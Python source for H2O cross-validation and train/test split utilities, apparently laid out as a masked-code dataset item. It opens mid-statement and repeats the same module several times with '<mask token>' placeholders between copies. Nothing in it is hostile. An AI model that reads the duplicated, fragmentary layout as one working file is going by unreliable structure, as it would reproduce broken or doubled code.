'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
def _build_repr(self):
cls = self.__class__
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
init_signature = signature(init)
if init is object.__init__:
args = []
else:
args = sorted([p.name for p in init_signature.parameters.values() if
p.name != 'self' and p.kind != p.VAR_KEYWORD])
class_name = self.__class__.__name__
params = dict()
for key in args:
warnings.simplefilter('always', DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
continue
finally:
warnings.filters.pop(0)
params[key] = value
return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))
def check_cv(cv=3):
"""Checks the ``cv`` parameter to determine
whether it's a valid int or H2OBaseCrossValidator.
Parameters
----------
cv : int or H2OBaseCrossValidator, optional (default=3)
The number of folds or the H2OBaseCrossValidator
instance.
Returns
-------
cv : H2OBaseCrossValidator
The instance of H2OBaseCrossValidator
"""
if cv is None:
cv = 3
if isinstance(cv, numbers.Integral):
return H2OKFold(cv)
if not isinstance(cv, H2OBaseCrossValidator):
raise ValueError(
'expected int or instance of H2OBaseCrossValidator but got %s' %
type(cv))
return cv
def h2o_train_test_split(frame, test_size=None, train_size=None,
random_state=None, stratify=None):
"""Splits an H2OFrame into random train and test subsets
Parameters
----------
frame : H2OFrame
The h2o frame to split
test_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25
train_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
stratify : str or None (default=None)
The name of the target on which to stratify the sampling
Returns
-------
out : tuple, shape=(2,)
training_frame : H2OFrame
The training fold split
testing_frame : H2OFrame
The testing fold split
"""
frame = check_frame(frame, copy=False)
if test_size is None and train_size is None:
test_size = 0.25
if stratify is not None:
CVClass = H2OStratifiedShuffleSplit
else:
CVClass = H2OShuffleSplit
cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,
random_state=random_state)
tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]
train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))
out = frame[train, :], frame[test, :]
return out
<mask token>
def _val_y(y):
if isinstance(y, six.string_types):
return str(y)
elif y is None:
return y
raise TypeError('y must be a string. Got %s' % y)
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
"""Base class for H2O cross validation operations.
All implementing subclasses should override ``get_n_splits``
and ``_iter_test_indices``.
"""
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
def _validate_shuffle_split_init(test_size, train_size):
"""Validation helper to check the test_size and train_size at init"""
if test_size is None and train_size is None:
raise ValueError('test_size and train_size can not both be None')
if test_size is not None:
if np.asarray(test_size).dtype.kind == 'f':
if test_size >= 1.0:
raise ValueError(
'test_size=%f should be smaller than 1.0 or be an integer'
% test_size)
elif np.asarray(test_size).dtype.kind != 'i':
raise ValueError('Invalid value for test_size: %r' % test_size)
if train_size is not None:
if np.asarray(train_size).dtype.kind == 'f':
if train_size >= 1.0:
raise ValueError(
'train_size=%f should be smaller than 1.0 or be an integer'
% test_size)
elif np.asarray(test_size
).dtype.kind == 'f' and train_size + test_size > 1.0:
raise ValueError(
'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'
% (train_size + test_size))
elif np.asarray(train_size).dtype.kind != 'i':
raise ValueError('Invalid value for train_size: %r' % train_size)
def _validate_shuffle_split(n_samples, test_size, train_size):
if test_size is not None and np.asarray(test_size
).dtype.kind == 'i' and test_size >= n_samples:
raise ValueError(
'test_size=%d should be smaller than the number of samples %d' %
(test_size, n_samples))
if train_size is not None and np.asarray(train_size
).dtype.kind == 'i' and train_size >= n_samples:
raise ValueError(
'train_size=%d should be smaller than the number of samples %d' %
(train_size, n_samples))
if np.asarray(test_size).dtype.kind == 'f':
n_test = ceil(test_size * n_samples)
elif np.asarray(test_size).dtype.kind == 'i':
n_test = float(test_size)
if train_size is None:
n_train = n_samples - n_test
elif np.asarray(train_size).dtype.kind == 'f':
n_train = floor(train_size * n_samples)
else:
n_train = float(train_size)
if test_size is None:
n_test = n_samples - n_train
if n_train + n_test > n_samples:
raise ValueError(
'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'
% (n_train + n_test, n_samples))
return int(n_train), int(n_test)
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| from __future__ import division, print_function, absolute_import
import numbers
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from .base import check_frame
from skutil.base import overrides
from sklearn.externals import six
from sklearn.base import _pprint
from sklearn.utils.fixes import signature, bincount
from sklearn.utils import check_random_state
from math import ceil, floor
try:
from h2o import H2OEstimator
except ImportError:
from h2o.estimators.estimator_base import H2OEstimator
try:
from sklearn.model_selection import KFold
SK18 = True
except ImportError:
from sklearn.cross_validation import KFold
SK18 = False
__all__ = [
'check_cv',
'h2o_train_test_split',
'H2OKFold',
'H2OShuffleSplit',
'H2OStratifiedKFold',
'H2OStratifiedShuffleSplit'
]
def _build_repr(self):
# XXX This is copied from sklearn.BaseEstimator's get_params
cls = self.__class__
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
init_signature = signature(init)
if init is object.__init__:
args = []
else:
args = sorted([p.name for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD])
class_name = self.__class__.__name__
params = dict()
for key in args:
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
continue
finally:
warnings.filters.pop(0)
params[key] = value
return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))
def check_cv(cv=3):
"""Checks the ``cv`` parameter to determine
whether it's a valid int or H2OBaseCrossValidator.
Parameters
----------
cv : int or H2OBaseCrossValidator, optional (default=3)
The number of folds or the H2OBaseCrossValidator
instance.
Returns
-------
cv : H2OBaseCrossValidator
The instance of H2OBaseCrossValidator
"""
if cv is None:
cv = 3
if isinstance(cv, numbers.Integral):
return H2OKFold(cv)
if not isinstance(cv, H2OBaseCrossValidator):
raise ValueError('expected int or instance of '
'H2OBaseCrossValidator but got %s'
% type(cv))
return cv
def h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None):
"""Splits an H2OFrame into random train and test subsets
Parameters
----------
frame : H2OFrame
The h2o frame to split
test_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25
train_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
stratify : str or None (default=None)
The name of the target on which to stratify the sampling
Returns
-------
out : tuple, shape=(2,)
training_frame : H2OFrame
The training fold split
testing_frame : H2OFrame
The testing fold split
"""
frame = check_frame(frame, copy=False)
if test_size is None and train_size is None:
test_size = 0.25
if stratify is not None:
CVClass = H2OStratifiedShuffleSplit
else:
CVClass = H2OShuffleSplit
cv = CVClass(n_splits=2,
test_size=test_size,
train_size=train_size,
random_state=random_state)
# for the h2o one, we only need iter 0
tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]
# h2o "doesn't reorder rows" so we need to keep these sorted...
train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))
out = (
frame[train, :],
frame[test, :]
)
return out
# Avoid a pb with nosetests...
h2o_train_test_split.__test__ = False
def _val_y(y):
if isinstance(y, six.string_types):
return str(y)
elif y is None:
return y
raise TypeError('y must be a string. Got %s' % y)
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
"""Base class for H2O cross validation operations.
All implementing subclasses should override ``get_n_splits``
and ``_iter_test_indices``.
"""
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
# h2o can't handle anything but lists...
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError('this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
def _validate_shuffle_split_init(test_size, train_size):
"""Validation helper to check the test_size and train_size at init"""
if test_size is None and train_size is None:
raise ValueError('test_size and train_size can not both be None')
if test_size is not None:
if np.asarray(test_size).dtype.kind == 'f':
if test_size >= 1.:
raise ValueError(
'test_size=%f should be smaller '
'than 1.0 or be an integer' % test_size)
elif np.asarray(test_size).dtype.kind != 'i':
raise ValueError('Invalid value for test_size: %r' % test_size)
if train_size is not None:
if np.asarray(train_size).dtype.kind == 'f':
if train_size >= 1.:
raise ValueError(
'train_size=%f should be smaller '
'than 1.0 or be an integer' % test_size)
elif (np.asarray(test_size).dtype.kind == 'f' and
(train_size + test_size) > 1.):
raise ValueError('The sum of test_size and train_size = %f'
'should be smaller than 1.0. Reduce test_size '
'and/or train_size.' % (train_size + test_size))
elif np.asarray(train_size).dtype.kind != 'i':
raise ValueError('Invalid value for train_size: %r' % train_size)
def _validate_shuffle_split(n_samples, test_size, train_size):
if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples:
raise ValueError('test_size=%d should be smaller '
'than the number of samples %d' % (test_size, n_samples))
if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples:
raise ValueError('train_size=%d should be smaller '
'than the number of samples %d' % (train_size, n_samples))
if np.asarray(test_size).dtype.kind == 'f':
n_test = ceil(test_size * n_samples)
elif np.asarray(test_size).dtype.kind == 'i':
n_test = float(test_size)
if train_size is None:
n_train = n_samples - n_test
elif np.asarray(train_size).dtype.kind == 'f':
n_train = floor(train_size * n_samples)
else:
n_train = float(train_size)
if test_size is None:
n_test = n_samples - n_train
if n_train + n_test > n_samples:
raise ValueError('The sum of train_size and test_size=%d, '
'should be smaller than the number of '
'samples %d. Reduce test_size and/or '
'train_size.' % (n_train + n_test, n_samples))
return int(n_train), int(n_test)
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:(n_test + n_train)]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples,
self.test_size, self.train_size)
# need to validate y...
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist())
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError('The least populated class in y has only 1 '
'member, which is too few. The minimum number of labels '
'for any class cannot be less than 2.')
if n_train < n_classes:
raise ValueError('The train_size=%d should be greater than or '
'equal to the number of classes=%d' % (n_train, n_classes))
if n_test < n_classes:
raise ValueError('The test_size=%d should be greater than or '
'equal to the number of classes=%d' % (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int))
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where((target == class_i))[0][permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
# Might end up here with less samples in train and test than we asked
# for, due to rounding errors.
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError('n_folds must be of Integral type. '
'%s of type %s was passed' % (n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError('k-fold cross-validation requires at least one '
'train/test split by setting n_folds=2 or more')
if shuffle not in [True, False]:
raise TypeError('shuffle must be True or False. Got %s (type=%s)'
% (str(shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
